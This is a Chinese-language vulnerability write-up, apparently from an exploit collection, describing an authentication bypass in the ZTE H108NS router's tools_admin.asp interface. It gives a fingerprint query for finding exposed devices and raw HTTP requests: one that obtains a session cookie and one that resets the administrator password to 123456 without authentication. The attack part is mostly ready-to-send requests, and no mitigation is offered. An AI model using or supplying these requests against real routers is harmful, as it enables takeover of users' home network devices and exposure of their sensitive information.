# 中兴H108NS 路由器存在任意密码修改漏洞

### 一、漏洞描述
中兴H108NS路由器tools_admin.asp接口处存在身份认证绕过漏洞，攻击者可利用该漏洞绕过身份认证允许访问路由器的管理面板修改管理员密码，获取用户的敏感信息

### 二、影响版本
<font style="color:#000000;">中兴H108NS 路由器</font>

### 三、资产测绘
```plain
product="ZTE-H108NS"
```

![1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1.png](./img/yg6Rd5hWh54g21ga/1720893566422-1dca4fef-cd22-42ec-a6c6-f1f781981eb1-490795.png)

### 四、漏洞复现
获取cookie

```java
GET / HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
```

![1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c.png](./img/yg6Rd5hWh54g21ga/1720893478802-fc32d4a7-4418-4bdc-b001-79fad466674c-592313.png)

使用获取cookie修改密码

```java
POST /cgi-bin/tools_admin.asp HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Cookie: SESSIONID=39a2aef8;
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 
adminFlag=1&CurrentAccess=0&uiViewTools_Password=123456&uiViewTools_PasswordConfirm=确认密码
```

min/123456登录系统![1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7.png](./img/yg6Rd5hWh54g21ga/1720893410557-a4febc66-46a5-477d-8c28-0218ba4363e7-749875.png)



> 更新: 2024-08-12 17:48:53  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vil2xt2pbg119yg4>